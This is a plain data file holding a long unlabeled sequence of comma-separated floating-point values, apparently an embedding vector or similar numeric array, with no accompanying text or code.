0.003103296970948577, 0.004300754517316818, 0.0016331609804183245, -0.0023289283271878958, 0.009230319410562515, -0.05682585388422012, -0.014563565142452717, 0.03421971946954727, 0.05359640344977379, 0.013080814853310585, 0.0032507958821952343, -0.0014322909992188215, 0.004413319285959005, 0.0002451439795549959, 0.03384709358215332, -0.003180928062647581, 0.030182911083102226, -0.02498163841664791, 0.007910593412816525, -0.0036273058503866196, 0.03338130563497543, 0.06409210711717606, 0.0033924723975360394, 0.00903624203056097, -0.0022280081175267696, -0.015332112088799477, -0.0492490716278553, 0.0033672424033284187, 0.005620480515062809, 0.0021484363824129105, -0.036393389105796814, 0.006750010885298252, -0.00825993251055479, -0.0070644160732626915, -0.0018951654201373458, 0.0002419902157271281, 0.037511274218559265, -0.024950586259365082, -0.0063929082825779915, -0.0031789871864020824, -0.004164900165051222, -0.016814863309264183, 0.01151266973465681, -0.031828686594963074, -0.041734397411346436, 0.005337127484381199, -0.04353543370962143, -0.013173971325159073, -0.010309389792382717, -0.025136901065707207, -0.011885297484695911, 0.05400008708238602, 0.015976449474692345, -0.0249971654266119, 0.06434053182601929, -0.046733830124139786, 0.004875223618000746, 0.016659600660204887, 0.008717955090105534, -0.0016933250008150935, 0.022978760302066803, 0.032077107578516006, -0.05126747861504555, 0.03307078406214714, 0.005395350977778435, 0.01061215065419674, -0.014726590365171432, -0.01891089789569378, 0.028956342488527298, -0.026767149567604065, 0.016054078936576843, 0.011295302771031857, 0.012809106148779392, -0.018802214413881302, -0.02037036046385765, 0.020261676982045174, 0.01157477404922247, 0.031378429383039474, 0.007798028644174337, 0.010643202811479568, -0.028971869498491287, -0.010192942805588245, 0.014843037351965904, -0.0020475161727517843, 0.008943084627389908, -0.003000436117872596, -0.022155871614813805, -0.02431401237845421, -0.022963233292102814, -0.025913210585713387, -0.031052378937602043, 0.05083274468779564, -0.004735487513244152, 0.036362335085868835, -0.003171224147081375, 0.022124819457530975, -0.00867137685418129, 0.00556225748732686, 0.021643508225679398, -0.042138077318668365, 0.024096645414829254, -0.01465672254562378, 0.01023175846785307, -0.027590038254857063, -0.022901128977537155, 0.017824064940214157, -0.05977582931518555, 0.010604387149214745, -0.032077107578516006, 0.009975576773285866, 0.01079070195555687, 0.023227179422974586, 0.013624231331050396, -0.006800470873713493, 0.0017418443458154798, -0.029763704165816307, 0.013375812210142612, 0.008267696015536785, 0.01540197990834713, 0.01157477404922247, 0.004393911454826593, -0.01773090846836567, -0.024935059249401093, -0.013437916524708271, -0.01959405094385147, 0.017544593662023544, 0.020882723852992058, 0.011768851429224014, 0.02622373402118683, -0.009773735888302326, 0.024143224582076073, 0.0014109424082562327, -0.005014959257096052, -0.032480787485837936, 0.03316393867135048, -0.03667286038398743, -0.009820315055549145, 0.027636617422103882, 0.03592760115861893, -0.021301930770277977, 0.0011586418841034174, 0.0030955339316278696, -0.031083431094884872, 0.004405556246638298, -0.012335557490587234, 0.006291988305747509, 0.010107548907399178, -0.005783505272120237, 0.006645209155976772, -0.012731474824249744, 0.017234070226550102, 0.012801342643797398, -0.002895634388551116, 0.022109294310212135, -0.014315146021544933, 0.044001221656799316, -0.01420646347105503, 0.02459348365664482, -0.015355400741100311, -0.0037418114952743053, 0.03959178179502487, -0.010216232389211655, -0.005628243554383516, 0.0165664441883564, 0.023972436785697937, -0.036424439400434494, -0.0012615028535947204, -0.012972131371498108, -0.00882663857191801, 0.000714204681571573, 0.006140607874840498, 0.0011314710136502981, -0.01499053556472063, -0.0016292794607579708, -0.006575341336429119, -0.02158140391111374, 0.0011052705813199282, 0.015122508630156517, -0.007425399962812662, 0.023196127265691757, -0.008244406431913376, -0.03763548284769058, -0.028180032968521118, -0.016613023355603218, -0.005185747053474188, 0.030151858925819397, -0.007110994774848223, 0.0010004688519984484, 0.004095032345503569, -0.005131405312567949, -0.011768851429224014, 0.010130838491022587, 0.005399232264608145, -0.019718259572982788, 0.01922142133116722, 0.024531379342079163, 0.009657289832830429, 0.0053914692252874374, 0.016271445900201797, 0.009983339346945286, 0.003113000886514783, -0.02583557926118374, 0.029546337202191353, 0.006462776102125645, 0.022621657699346542, 0.038256529718637466, -0.03195289894938469, 0.03078843280673027, -0.0048286449164152145, 0.009486502036452293, -0.007114876061677933, 0.0003192572621628642, 0.028180032968521118, 0.0347786620259285, -0.03707654029130936, 0.020944830030202866, -0.01520013902336359, 0.020944830030202866, 0.0020766279194504023, -0.0018874023808166385, 0.03300867974758148, -0.005084827076643705, -0.008702429011464119, 0.00882663857191801, 0.020991407334804535, -0.02150377258658409, -0.02431401237845421, -0.01232779398560524, 0.0329776257276535, 0.03204605355858803, 0.013787255622446537, -0.020292729139328003, -0.005034367088228464, -0.013298180885612965, 0.013360286131501198, -0.024577956646680832, 0.03738706186413765, -0.01769985631108284, -0.02617715485394001, 0.005620480515062809, 0.00927689764648676, 0.023211652413010597, 0.022590605542063713, -0.0017961859703063965, 0.00003917936919606291, 0.029065025970339775, 0.00035831533023156226, 0.03266710042953491, -0.031828686594963074, 0.029779231175780296, 0.017793012782931328, -0.01558053120970726, -0.013010947033762932, -0.02504374273121357, -0.03412656486034393, -0.005946530494838953, -0.010487941093742847, -0.0006448220228776336, 0.027232935652136803, -0.016271445900201797, -0.028304243460297585, 0.01349225826561451, 0.012420951388776302, 0.030198438093066216, -0.017979327589273453, -0.04592646658420563, 0.022466395050287247, -0.011318592354655266, -0.01172227319329977, -0.025307688862085342, 0.004766540136188269, -0.0009936761343851686, -0.03341235965490341, -0.012987657450139523, -0.009005189873278141, 0.0031576387118548155, -0.015246718190610409, -0.011862008832395077, 0.012001744471490383, -0.008019276894629002, 0.0204479917883873, 0.004366740584373474, -0.01886432059109211, 0.014315146021544933, -0.015487373806536198, 0.014128832146525383, 0.051019057631492615, -0.016395656391978264, -0.02035483345389366, 0.004184307996183634, 0.006959614343941212, -0.02620820701122284, 0.016721704974770546, -0.03170447796583176, 0.018274324014782906, -0.001845675753429532, 0.03726285323500633, 0.015720266848802567, 0.03232552483677864, -0.005104234907776117, 0.019500894472002983, -0.001739903585985303, 0.005275022704154253, 0.018631426617503166, 0.02428296022117138, -0.017901696264743805, 0.037200748920440674, 0.004347332753241062, -0.0028005363419651985, 0.00808138120919466, 0.000057040550018427894, -0.01444711908698082, 0.038349688053131104, 0.010192942805588245, -0.026472153142094612, -0.023320335894823074, -0.04772750660777092, -0.03630023077130318, -0.02307191677391529, 0.027931613847613335, 0.021348509937524796, 0.005931004416197538, 0.019733786582946777, -0.005146931856870651, 0.006427842192351818, 0.02381717413663864, 0.015518425963819027, -0.038691263645887375, 0.02046351693570614, 0.007860133424401283, -0.034499190747737885, -0.016426708549261093, 0.015006061643362045, -0.0023599807173013687, -0.013709625229239464, -0.018196694552898407, -0.02970159985125065, -0.0009568014065735042, -0.01421422604471445, 0.008236642926931381, 0.033257097005844116, 0.008322037756443024, 0.008593745529651642, 0.00595041224732995, -0.021767716854810715, 0.020587727427482605, -0.012972131371498108, -0.003743752371519804, 0.009401107206940651, -0.004168781917542219, -0.0027403724379837513, 0.019314579665660858, -0.01697012409567833, -0.009346765466034412, 0.040554407984018326, -0.0039863488636910915, 0.018693530932068825, 0.021457193419337273, 0.02043246477842331, -0.007277901284396648, -0.020618779584765434, 0.010363731533288956, 0.006272580474615097, -0.013709625229239464, -0.03654864802956581, 0.006746129132807255, 0.0011130337370559573, -0.0105578089132905, -0.03035370074212551, 0.03844284266233444, -0.01852274313569069, -0.023366915062069893, 0.02113114297389984, -0.03990230709314346, 0.006750010885298252, -0.03897073492407799, 0.0048286449164152145, -0.012483055703341961, -0.014493697322905064, -0.0029344498179852962, -0.012374373152852058, -0.014881852082908154, 0.02224902994930744, 0.0033730645664036274, 0.017513541504740715, 0.017839591950178146, -0.001112063298933208, -0.013150682672858238, -0.027046620845794678, 0.006901391316205263, 0.017156438902020454, -0.005135287065058947, -0.0061988309025764465, 0.04288333281874657, 0.013445680029690266, -0.023956909775733948, -0.018615901470184326, 0.027512406930327415, 0.000027928945200983435, -0.0033633606508374214, 0.03912599757313728, -0.03648654371500015, 0.013391338288784027, 0.013336996547877789, -0.0031576387118548155, -0.01810353621840477, 0.04049229994416237, -0.029080552980303764, 0.011605826206505299, 0.010759648866951466, -0.0027112606912851334, 0.007817436009645462, -0.006994548253715038, 0.011388460174202919, -0.020960355177521706, -0.0072584934532642365, -0.03279131278395653, 0.012847921811044216, -0.0165664441883564, -0.009711631573736668, 0.018196694552898407, 0.013841597363352776, -0.008275458589196205, 0.007359413895756006, 0.010495703667402267, 0.015254480764269829, 0.02813345566391945, -0.0030043176375329494, 0.005931004416197538, 0.001871876185759902, -0.0029111604671925306, 0.004063980188220739, 0.006575341336429119, 0.01811906322836876, -0.017249595373868942, -0.015254480764269829, -0.004688909277319908, -0.017249595373868942, -0.016845915466547012, -0.022854549810290337, -0.0016758580459281802, 0.0322323702275753, 0.004118321463465691, 0.01687696762382984, 0.027807405218482018, -0.018336430191993713, 0.02235771156847477, 0.005426403135061264, 0.017466962337493896, -0.0011237079743295908, 0.022016135975718498, 0.018973004072904587, -0.015262244269251823, 0.023956909775733948, 0.025633739307522774, -0.014183173887431622, 0.017047755420207977, 0.02153482474386692, 0.004595751874148846, 0.012785816565155983, -0.03198394924402237, 0.021084565669298172, -0.01655091717839241, -0.0570121668279171, -0.011419512331485748, 0.013531073927879333, 0.013383574783802032, 0.00902847945690155, -0.01583671383559704, -0.018383007496595383, -0.0028005363419651985, 0.01697012409567833, -0.008391905575990677, -0.034095510840415955, -0.009579658508300781, -0.0138804130256176, -0.013267128728330135, -0.009797025471925735, -0.006571459583938122, -0.0011877535143867135, -0.013554363511502743, 0.006990666501224041, 0.0041765449568629265, 0.01734275370836258, -0.006272580474615097, -0.04192071035504341, -0.034406036138534546, 0.011419512331485748, 0.0038039162755012512, 0.0010839221067726612, 0.0014245278434827924, -0.035617079585790634, 0.0018961358582600951, -0.005255614873021841, -0.016706179827451706, 0.0015351519687101245, -0.00221442268230021, -0.002653037663549185, 0.023661911487579346, 0.01811906322836876, -0.011054647155106068, -0.0020028783474117517, 0.01328265480697155, -0.01698565110564232, -0.008306511677801609, -0.032853417098522186, -0.025230057537555695, -0.01965615525841713, -0.03040027804672718, -0.009486502036452293, -0.013608705252408981, 0.015929870307445526, -0.014680012129247189, 0.005406995303928852, 0.022870076820254326, -0.019066160544753075, 0.012397661805152893, -0.003966941498219967, 0.008337563835084438, -0.016054078936576843, -0.004568581003695726, -0.011396222747862339, 0.014874089509248734, 0.007308953441679478, -0.017187491059303284, -0.003815561067312956, 0.008089144714176655, 0.017886169254779816, -0.00789506733417511, -0.0096262376755476, 0.02274586632847786, -0.0007374939741566777, -0.01996667869389057, 0.008593745529651642, 0.01651986502110958, 0.014532512985169888, -0.013507784344255924, -0.001824327278882265, -0.02811792865395546, 0.006750010885298252, -0.015254480764269829, -0.018802214413881302, 0.018258798867464066, -0.05729163810610771, -0.01136517059057951, -0.024966111406683922, -0.023553229868412018, -0.011830955743789673, 0.02431401237845421, -0.04502594843506813, 0.0455227866768837, -0.000808817392680794, 0.01292555220425129, 0.02465558797121048, -0.011046883650124073, -0.02342901937663555, -0.011202145367860794, -0.005011077504605055, 0.04431174322962761, -0.006187186576426029, 0.028180032968521118, -0.0073904660530388355, 0.022031662985682487, -0.03623812645673752, 0.0048480527475476265, 0.03515129163861275, 0.0025831698440015316, -0.00019031712145078927, 0.011970692314207554, 0.011116751469671726, -0.032108157873153687, -0.007635003421455622, 0.01420646347105503, -0.011706747114658356, 0.006971259135752916, 0.023211652413010597, -0.005923241376876831, -0.021270878612995148, -0.06564472615718842, -0.020680883899331093, 0.04657856747508049, -0.0009116784203797579, -0.024515852332115173, 0.00999110285192728, 0.009571895934641361, 0.0030974748078733683, -0.0177619606256485, 0.010216232389211655, -0.00389707344584167, 0.003316782182082534, -0.015355400741100311, -0.024826375767588615, -0.003506978042423725, -0.005977582652121782, 0.007126520853489637, -0.007479741703718901, 0.0014274390414357185, -0.03800811246037483, 0.005519560072571039, -0.0019417440053075552, 0.007305072154849768, 0.011830955743789673, -0.027590038254857063, -0.0199977308511734, 0.042572811245918274, 0.022155871614813805, -0.011287539266049862, 0.009556369855999947, -0.01774643361568451, 0.018336430191993713, 0.008112434297800064, 0.004941209685057402, 0.011823193170130253, -0.013422390446066856, 0.037604428827762604, -0.006509354803711176, -0.0056787035427987576, 0.011147803626954556, 0.006105673965066671, -0.0117533253505826, -0.01118661928921938, 0.016224868595600128, 0.005783505272120237, 0.022932181134819984, 0.007681582123041153, 0.0010431658010929823, 0.00941663421690464, 0.0007845577201806009, -0.0353686586022377, -0.02533874101936817, -0.04570909962058067, -0.03872231766581535, 0.020572200417518616, 0.03307078406214714, -0.017994852736592293, -0.019547471776604652, -0.016224868595600128, -0.008446247316896915, 0.020680883899331093, -0.01773090846836567, 0.0005356535548344254, 0.00421924190595746, -0.032511841505765915, 0.01773090846836567, -0.031067904084920883, 0.05778847634792328, -0.0012450063368305564, -0.024003488942980766, -0.006862575653940439, -0.009711631573736668, -0.03394024819135666, -0.017451437190175056, 0.00864808727055788, -0.019143791869282722, -0.014672248624265194, -0.027590038254857063, -0.03359867259860039, -0.01697012409567833, -0.01995115354657173, 0.002313402248546481, 0.0074137551710009575, 0.014392777346074581, -0.014330673031508923, 0.007208033464848995, 0.0180569589138031, 0.000009461271474719979, -0.0026996161323040724, 0.016364604234695435, -0.011295302771031857, 0.006187186576426029, 0.001997056184336543, -0.013771729543805122, -0.018957477062940598, 0.0020766279194504023, -0.01855379529297352, -0.004646212328225374, 0.032480787485837936, -0.021410614252090454, -0.009688341990113258, 0.005131405312567949, 0.0007733983220532537, 0.012521871365606785, -0.0013750381767749786, -0.02162798121571541, -0.023304810747504234, -0.025090321898460388, -0.015565005131065845, -0.024019014090299606, -0.0075457277707755566, 0.0037825678009539843, 0.07496044039726257, -0.011380696669220924, 0.011691220104694366, 0.011691220104694366, 0.0051973918452858925, 0.015006061643362045, 0.027217410504817963, -0.0017651335801929235, 0.0010868331883102655, 0.004731606226414442, -0.001454609795473516, 0.00791835691779852, 0.010984779335558414, -0.006455013062804937, -0.0025365911424160004, 0.0045064762234687805, -0.024810850620269775, 0.006004753522574902, 0.030276069417595863, -0.0028723450377583504, 0.01614723727107048, 0.0012071612291038036, 0.015293296426534653, -0.01773090846836567, 0.007316716481000185, 0.004126084968447685, -0.02771424688398838, -0.010286100208759308, -0.03341235965490341, -0.006944088265299797, -0.004646212328225374, -0.032201316207647324, -0.016364604234695435, -0.0038407910615205765, -0.0001129894153564237, 0.0037922717165201902, 0.029065025970339775, -0.019066160544753075, -0.02768319472670555, -0.021317457780241966, -0.005931004416197538, -0.01442382950335741, 0.005104234907776117, -0.004898512735962868, 0.007475859951227903, -0.015914343297481537, 0.005135287065058947, 0.006427842192351818, -0.025711368769407272, 0.012514108791947365, 0.013562126085162163, -0.027636617422103882, 0.024422695860266685, 0.009579658508300781, 0.016054078936576843, 0.006144489161670208, 0.0031945134978741407, -0.00846177339553833, -0.01561158336699009, -0.0012372431810945272, 0.00047524695401079953, -0.009346765466034412, 0.013523310422897339, 0.005092590115964413, -0.014190937392413616, 0.006792707834392786, -0.0037476338911801577, 0.014897378161549568, -0.026099523529410362, 0.032915521413087845, 0.022419817745685577, 0.001932040206156671, 0.004172663204371929, 0.005302193574607372, 0.002909219590947032, 0.017016703262925148, 0.009432160295546055, 0.01886432059109211, -0.0019737668335437775, -0.009727157652378082, -0.016333550214767456, 0.017203018069267273, -0.025167953222990036, 0.006990666501224041, -0.003485629567876458, 0.04247965291142464, -0.02007536217570305, 0.0029014565516263247, 0.016799336299300194, -0.002295935293659568, -0.000005682069513568422, 0.015161323361098766, 0.017932748422026634, -0.03912599757313728, 0.0347786620259285, 0.01889537274837494, 0.011062409728765488, 0.012964367866516113, -0.02572689577937126, 0.0015894935932010412, 0.01737380586564541, 0.011714509688317776, -0.00021202952484600246, -0.0003658358473330736, -0.037200748920440674, 0.00499943271279335, 0.013934754766523838, 0.02077404037117958, -0.012560687027871609, -0.01480422168970108, -0.04664067178964615, -0.022016135975718498, 0.0043085175566375256, 0.00527890445664525, -0.021767716854810715, 0.02889423817396164, -0.0015118626179173589, 0.004960617516189814, 0.00616001570597291, -0.027481354773044586, -0.0006943117477931082, 0.0030120806768536568, 0.018693530932068825, -0.00566705921664834, 0.011326354928314686, 0.019081685692071915, 0.016659600660204887, -0.005616598762571812, 0.04347332939505577, 0.005934885703027248, 0.03350551798939705, 0.0045220027677714825, 0.0082832220941782, 0.014330673031508923, 0.01116332970559597, -0.018755637109279633, 0.012374373152852058, 0.010992541909217834, -0.016659600660204887, 0.009393344633281231, -0.04306964948773384, 0.022186923772096634, 0.01651986502110958, 0.006187186576426029, -0.01732722669839859, -0.009672815911471844, 0.00732836127281189, 0.024096645414829254, -0.0022299489937722683, 0.018243271857500076, -0.008228880353271961, -0.01651986502110958, 0.0045336470939219, 0.030260542407631874, -0.012801342643797398, -0.025975314900279045, 0.0408959835767746, -0.017063282430171967, -0.01580565981566906, 0.030959220603108406, 0.0004405556246638298, 0.0031246456783264875, -0.0045258840546011925, -0.010449125431478024, 0.02658083662390709, 0.03425077348947525, 0.007270138245075941, -0.016783811151981354, -0.014509223401546478, -0.024500327184796333, 0.005651532672345638, -0.004646212328225374, 0.014051200821995735, 0.020867198705673218, -0.0006074621342122555, 0.01118661928921938, 0.013406864367425442, 0.0035768458619713783, -0.0012508286163210869, -0.007700989954173565, -0.012902263551950455, 0.008593745529651642, 0.005290548782795668, 0.008950848132371902, -0.007650529965758324, -0.018584849312901497, -0.014951719902455807, -0.007883423008024693, -0.0401507243514061, 0.016473285853862762, 0.009765973314642906, -0.013236076571047306, -0.0005167310009710491, -0.0011547603644430637, -0.01651986502110958, -0.011403986252844334, -0.026472153142094612, -0.03921915218234062, -0.008027039468288422, 0.020603252574801445, 0.015184612944722176, -0.014928431250154972, 0.0063735004514455795, 0.02344454638659954, -0.014276331290602684, -0.03041580505669117, 0.0022571198642253876, -0.010433599352836609, 0.0074331630021333694, 0.009432160295546055, 0.0014235575217753649, 0.021348509937524796, 0.005441929213702679, -0.016085132956504822, 0.007782502565532923, -0.012063848786056042, 0.0027500763535499573, -0.013981333002448082, 0.019314579665660858, -0.018973004072904587, 0.0005308015970513225, 0.019159317016601562, -0.008663613349199295, -0.02881660684943199, 0.02465558797121048, 0.04241754859685898, 0.008376379497349262, -0.02845950424671173, -0.02771424688398838, 0.024112172424793243, -0.02661188878118992, -0.009983339346945286, 0.017404858022928238, 0.010029918514192104, 0.0014274390414357185, 0.012304505333304405, 0.007848489098250866, 0.02117772214114666, -0.002039753133431077, 0.011442801915109158, 0.012568450532853603, -0.02389480546116829, -0.01155148446559906, -0.01426080521196127, 0.007103231735527515, -0.000359528319677338, -0.008749007247388363, -0.02884765900671482, -0.008360852487385273, 0.02572689577937126, -0.01384936086833477, 0.0008587923366576433, 0.0009199267369695008, 0.0029422128573060036, -0.0063502113334834576, 0.032573945820331573, -0.005088708363473415, -0.0015574708813801408, 0.010115312412381172, 0.0029305682983249426, -0.016442233696579933, -0.00978926196694374, 0.001998996827751398, -0.020587727427482605, -0.04070966690778732, 0.030912643298506737, -0.005240088794380426, 0.00356131955049932, 0.03204605355858803, -0.020230624824762344, 0.005655414424836636, -0.019035108387470245, -0.013569889590144157, -0.01769985631108284, -0.002540472662076354, 0.008617035113275051, 0.01956299878656864, -0.005558375734835863, 0.004316280595958233, -0.0013847419759258628, 0.015324348583817482, 0.02578900009393692, -0.016457760706543922, -0.012467529624700546, 0.01348449569195509, -0.01155148446559906, -0.02918923646211624, -0.02273034118115902, -0.03347446396946907, 0.0012420951388776302, 0.010852806270122528, 0.0014701359905302525, -0.008717955090105534, -0.020634304732084274, -0.00761559559032321, 0.0031265863217413425, -0.013895939104259014, 0.010270574130117893, 0.025571633130311966, -0.025913210585713387, 0.01967168226838112, 0.015510663390159607, 0.0037883901968598366, 0.0022260674741119146, -0.02957739122211933, -0.0034118799958378077, 0.004227004945278168, -0.00768934516236186, 0.0001941986702149734, 0.005127524025738239, 0.022854549810290337, -0.009859129786491394, -0.023304810747504234, -0.008989663794636726, -0.012389899231493473, -0.009905708953738213, -0.004390030167996883, -0.01023175846785307, 0.0048131188377738, 0.008050329051911831, -0.007840725593268871, -0.0046539753675460815, -0.012793580070137978, -0.010720833204686642, -0.004537528846412897, -0.014540276490151882, 0.025913210585713387, -0.019764838740229607, 0.000029126767913112417, -0.034002356231212616, 0.031347375363111496, 0.033691830933094025, 0.019547471776604652, -0.010480177588760853, 0.013934754766523838, -0.018926424905657768, 0.005899951793253422, -0.012063848786056042, -0.012847921811044216, 0.008686902932822704, -0.03667286038398743, 0.0015739673981443048, -0.023196127265691757, -0.009983339346945286, 0.034468140453100204, -0.0030683630611747503, 0.005752453114837408, 0.008787822909653187, -0.0002770454448182136, -0.04204491898417473, 0.008834402076900005, -0.024484800174832344, 0.0005992138758301735, 0.017218543216586113, 0.008337563835084438, 0.018010379746556282, 0.010208469815552235, 0.005744690075516701, 0.02308744378387928, -0.005729163996875286, -0.003101356327533722, -0.003276025876402855, -0.012809106148779392, -0.02038588561117649, 0.0017971564084291458, -0.013158445246517658, 0.008197828195989132, 0.012948841787874699, -0.019469840452075005, 0.0037088184617459774, -0.01424527820199728, -0.007596188224852085, -0.021084565669298172, 0.0004395852447487414, 0.005581664852797985, -0.004875223618000746, -0.00924584548920393, -0.017994852736592293, -0.0014352020807564259, 0.023661911487579346, 0.002480308758094907, -0.004440490156412125, -0.01847616583108902, 0.017203018069267273, -0.04244860261678696, 0.0013362226309254766, -0.010076496750116348, 0.0014701359905302525, -0.004568581003695726, -0.0020649831276386976, -0.00768934516236186, 0.03633128106594086, 0.011745561845600605, 0.00538758747279644, -0.003243032842874527, 0.019920101389288902, 0.004580225795507431, -0.033226046711206436, -0.032139211893081665, 0.010720833204686642, 0.03468550741672516, -0.0008243435877375305, -0.012157006189227104, 0.005744690075516701, 0.019143791869282722, 0.0015264184912666678, 0.0010868331883102655, -0.002866522641852498, -0.004393911454826593, -0.011272013187408447, 0.012250163592398167, 0.00026540079852566123, -0.008236642926931381, -0.00905953161418438, -0.0052167996764183044, -0.0027675433084368706, 0.009579658508300781, 0.018600374460220337, 0.007142046932131052, 0.01190858706831932, -0.002307579852640629, 0.03272920846939087, -0.001469165668822825, -0.0025967550463974476, 0.011652405373752117, -0.0199977308511734, 0.005418640095740557, -0.001014054287225008, -0.00442496407777071, 0.0034196432679891586, -0.0009301157551817596, 0.012599502690136433, 0.019097212702035904, 0.006249291356652975, 0.02083614654839039, 0.01328265480697155, -0.01771538145840168, 0.01616276241838932, -0.01650433987379074, 0.009828077629208565, 0.021860875189304352, -0.00566705921664834, -0.013523310422897339, -0.002959679812192917, -0.015945395454764366, -0.02046351693570614, -0.024081120267510414, -0.015138034708797932, 0.005123642273247242, -0.03344340994954109, -0.015238954685628414, 0.02614610269665718, 0.02196955867111683, 0.0072352043353021145, 0.008298748172819614, -0.009175977669656277, -0.013437916524708271, -0.00693632522597909, -0.008717955090105534, 0.02041693963110447, 0.012428714893758297, -0.0011586418841034174, 0.02807134948670864, 0.009719394147396088, 0.013422390446066856, 0.019454315304756165, 0.011745561845600605, 0.008989663794636726, 0.019547471776604652, 0.01176108792424202, 0.023242704570293427, -0.004983906634151936, 0.005818439181894064, 0.012941078282892704, -0.001258591772057116, -0.00432404363527894, -0.02582005225121975, -0.00849282555282116, -0.004844170995056629, -0.020680883899331093, -0.016737231984734535, 0.0169390719383955, -0.017078807577490807, 0.0003993141872342676, -0.0012770290486514568, 0.019128264859318733, 0.002468664199113846, -0.002305639209225774, -0.007988224737346172, 0.013996860012412071, 0.005403114017099142, 0.005896070506423712, -0.007592306472361088, 0.006226001773029566, 0.013026473112404346, 0.0010625736322253942, -0.006571459583938122, -0.004087269306182861, -0.010053207166492939, -0.01766880415380001, -0.008927558548748493, -0.004095032345503569, 0.0010295803658664227, -0.004164900165051222, 0.009874656796455383, -0.010418073274195194, -0.03185974061489105, 0.001157671445980668, 0.015976449474692345, -0.019500894472002983, -0.008710192516446114, -0.0035826682578772306, -0.016737231984734535, 0.007200270425528288, -0.01289450004696846, -0.012855684384703636, -0.005069300998002291, 0.011830955743789673, 0.007448689080774784, -0.003353656968101859, 0.019454315304756165, 0.0011275894939899445, -0.000309795985231176, 0.003836909541860223, 0.0030877708923071623, 0.0019262178102508187, -0.0009699016227386892, -0.0012692660093307495, -0.0029849098064005375, -0.047106459736824036, -0.0005259496392682195, 0.008547167293727398, -0.008694665506482124, -0.010658728890120983, 0.028630292043089867, -0.005946530494838953, 0.003000436117872596, 0.0028529372066259384, -0.002691853092983365, -0.02583557926118374, 0.015075929462909698, -0.015075929462909698, -0.0005749542033299804, 0.016768284142017365, 0.0015079810982570052, -0.0068897465243935585, -0.026083998382091522, -0.011792141012847424, 0.021814296022057533, -0.015207902528345585, -0.007312835194170475, 0.0019805594347417355, -0.00012232939479872584, -0.0006957673467695713, -0.003479807171970606, -0.002618103753775358, 0.0020455755293369293, -0.0063502113334834576, 0.0028393517713993788, 0.0045064762234687805, -0.024748746305704117, 0.004258057568222284, 0.010713070631027222, 0.015929870307445526, 0.00782131776213646, 0.006148370914161205, 0.00006513721746159717, 0.0009742683614604175, 0.007879541255533695, -0.006284225266426802, -0.00595041224732995, -0.02467111498117447, 0.005065419245511293, -0.010883858427405357, -0.007437044754624367, 0.01173003576695919, 0.010123074986040592, -0.00867913942784071, 0.02041693963110447, -0.0025482357013970613, 0.019842470064759254, -0.004452134948223829, 0.008314274251461029, 0.0014264686033129692, 0.00510035315528512, 0.013375812210142612, 0.009152688086032867, -0.02195403166115284, -0.0184295866638422, -0.014392777346074581, 0.03580339252948761, 0.03788390010595322, -0.022823497653007507, -0.009168215095996857, 0.008213354274630547, -0.02120877429842949, 0.008345326408743858, 0.006097910925745964, 0.005294430535286665, 0.022901128977537155, -0.00255017657764256, 0.015355400741100311, -0.009711631573736668, -0.010371494106948376, -0.0031188232824206352, -0.008329800330102444, 0.013756203465163708, 0.005865017883479595, -0.013577652163803577, -0.012025033123791218, -0.022466395050287247, -0.004774303175508976, 0.0007937764166854322, 0.008694665506482124, -0.023956909775733948, -0.005119760986417532, 0.00414549233391881, 0.002713201567530632, 0.010029918514192104, -0.01768432930111885, 0.025680316612124443, 0.02007536217570305, 0.0013789196964353323, -0.011846482753753662, 0.012436477467417717, 0.0014449059963226318, 0.017544593662023544, -0.022109294310212135, -0.009191503748297691, 0.014548039063811302, 0.003297374350950122, 0.005057656206190586, -0.0020028783474117517, 0.011380696669220924, 0.0013895939337089658, 0.03608286380767822, -0.01807248406112194, -0.008966374211013317, -0.035213395953178406, -0.013663046061992645, -0.0177619606256485, -0.007068297825753689, -0.013142919167876244, 0.018988529220223427, -0.013631993904709816, -0.006885864771902561, -0.001296436763368547, -0.0038019756320863962, 0.00122948014177382, 0.011473854072391987, 0.01038702018558979, 0.03001212328672409, -0.009323476813733578, 0.010138601996004581, 0.0006399701233021915, 0.017870644107460976, 0.01465672254562378, -0.012273452244699001, -0.013655283488333225, -0.0015729970764368773, 0.017839591950178146, 0.008430720306932926, 0.0065675778314471245, 0.010705307126045227, -0.003961118869483471, 0.009090583771467209, -0.024500327184796333, 0.006967377383261919, 0.011489380151033401, 0.014385014772415161, 0.0012255985056981444, 0.02114666998386383, 0.03592760115861893, -0.024189801886677742, -0.01967168226838112, -0.013678573071956635, -0.011435038410127163, -0.011605826206505299, -0.007254611700773239, 0.007060534320771694, 0.0013410745887085795, 0.0169390719383955, -0.0027287276461720467, -0.012747000902891159, -0.0035729643423110247, -0.006979022175073624, 0.007635003421455622, -0.021270878612995148, 0.012552923522889614, -0.028397399932146072, 0.010736360214650631, -0.01959405094385147, 0.007972697727382183, -0.005325482692569494, -0.016426708549261093, -0.03893968090415001, -0.007398229092359543, -0.00022270377667155117, 0.0026278074365109205, -0.0007442866917699575, 0.00963400024920702, -0.01270818617194891, -0.003918421920388937, 0.019873522222042084, -0.004316280595958233, -0.00010559021757217124, 0.02504374273121357, 0.0057175192050635815, -0.005034367088228464, -0.010456888005137444, 0.012552923522889614, -0.02266823686659336, 0.014532512985169888, -0.0050227222964167595, 0.006684024352580309, 0.02341349422931671, 0.00732447998598218, 0.0092147933319211, 0.007867895998060703, -0.007165336515754461, 0.0045336470939219, 0.029080552980303764, -0.006008635275065899, -0.01923694834113121, -0.002181429648771882, 0.007747568190097809, -0.026705045253038406, -0.00567094050347805, -0.014726590365171432, -0.001550678163766861, 0.004463779274374247, 0.01367080956697464, 0.006377382203936577, 0.008003750815987587, -0.000022425032511819154, -0.02468664012849331, 0.015681451186537743, -0.012475293129682541, -0.018693530932068825, -0.02389480546116829, 0.030586592853069305, 0.00740599213168025, -0.011209908872842789, 0.0025889920070767403, 0.0032042174134403467, 0.02074298821389675, -0.000057556069805286825, 0.02734161913394928, -0.0014080313267186284, 0.005294430535286665, -0.012677133083343506, -0.0020688646472990513, -0.0041416110470891, -0.004459897987544537, 0.020618779584765434, -0.014610144309699535, -0.014780932106077671, -0.011838719248771667, 0.011652405373752117, -0.011660167947411537, 0.02653425745666027, 0.009137162007391453, -0.0037379299756139517, 0.020556675270199776, 0.014905141666531563, -0.02119324915111065, -0.008523877710103989, 0.012056086212396622, 0.01173003576695919, -0.026052946224808693, -0.02928239293396473, -0.006078503094613552, 0.022419817745685577, 0.00020135527302045375, -0.002818003296852112, -0.0011751384008675814, -0.005767979193478823, -0.008298748172819614, -0.01325160264968872, -0.008686902932822704, 0.02159692905843258, -0.01079846452921629, -0.019438788294792175, 0.0025152426678687334, 0.0052167996764183044, -0.006885864771902561, 0.002466723322868347, 